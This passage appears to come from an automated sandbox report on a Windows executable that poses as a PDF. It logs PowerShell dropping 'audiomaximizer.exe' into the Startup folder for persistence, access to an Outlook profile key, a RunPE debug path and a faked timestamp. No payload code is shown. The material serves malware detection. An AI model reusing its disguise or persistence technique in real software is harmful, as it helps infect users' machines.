            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeAutomated click: Continue
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeAutomated click: Continue
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeAutomated click: Continue
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeAutomated click: Continue
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeAutomated click: Continue
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeAutomated click: Continue
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeAutomated click: Continue
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeAutomated click: Continue
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeAutomated click: Continue
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeAutomated click: Continue
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeAutomated click: Continue
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeAutomated click: OK
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeAutomated click: Continue
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeAutomated click: Continue
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeAutomated click: Continue
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeAutomated click: Continue
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeAutomated click: Continue
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeAutomated click: Continue
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeAutomated click: Continue
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeAutomated click: Continue
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeAutomated click: Continue
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeAutomated click: Continue
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeAutomated click: Continue
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeAutomated click: Continue
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeAutomated click: Continue
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeAutomated click: Continue
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeAutomated click: Continue
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeAutomated click: Continue
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeAutomated click: Continue
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeAutomated click: Continue
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeAutomated click: Continue
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeAutomated click: Continue
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeAutomated click: Continue
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeAutomated click: Continue
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeAutomated click: Continue
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeAutomated click: Continue
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeAutomated click: Continue
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeAutomated click: Continue
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeAutomated click: Continue
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeAutomated click: Continue
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeAutomated click: Continue
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: PDF-3093900299039 pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: PDF-3093900299039 pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: PDF-3093900299039 pdf.exe, 00000000.00000002.4131470172.0000000002821000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000000.00000002.4158359393.0000000005060000.00000004.08000000.00040000.00000000.sdmp, audiomaximizer.exe, 00000005.00000002.4134302304.00000000030C1000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.pdb source: PDF-3093900299039 pdf.exe, 00000003.00000002.4173710615.0000000006C6A000.00000004.00000020.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4172276540.0000000006A26000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: PDF-3093900299039 pdf.exe, 00000003.00000002.4173710615.0000000006C6A000.00000004.00000020.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4172276540.0000000006A26000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.pdbt source: PDF-3093900299039 pdf.exe, 00000003.00000002.4173710615.0000000006C6A000.00000004.00000020.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4172276540.0000000006A26000.00000004.00000020.00020000.00000000.sdmp
            Source: PDF-3093900299039 pdf.exeStatic PE information: 0xF79C3086 [Tue Aug 23 02:46:30 2101 UTC]
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 0_2_06CE8620 push esp; retf 0_2_06CE8621
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 0_2_06CE8C98 pushfd ; iretd 0_2_06CE8CA1
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 0_2_06CE8C12 push eax; iretd 0_2_06CE8C19
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_076132F7 push ebp; iretd 3_2_076132F8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_016868F1 push 00000001h; ret 8_2_01686900
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_073F32F7 push ebp; iretd 8_2_073F32F8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_073F594F push es; ret 8_2_073F5950
            Source: PDF-3093900299039 pdf.exeStatic PE information: section name: .text entropy: 7.290668751533855
            Source: audiomaximizer.exe.1.drStatic PE information: section name: .text entropy: 7.290668751533855
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeJump to dropped file

            Boot Survival

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe\:Zone.Identifier:$DATAJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
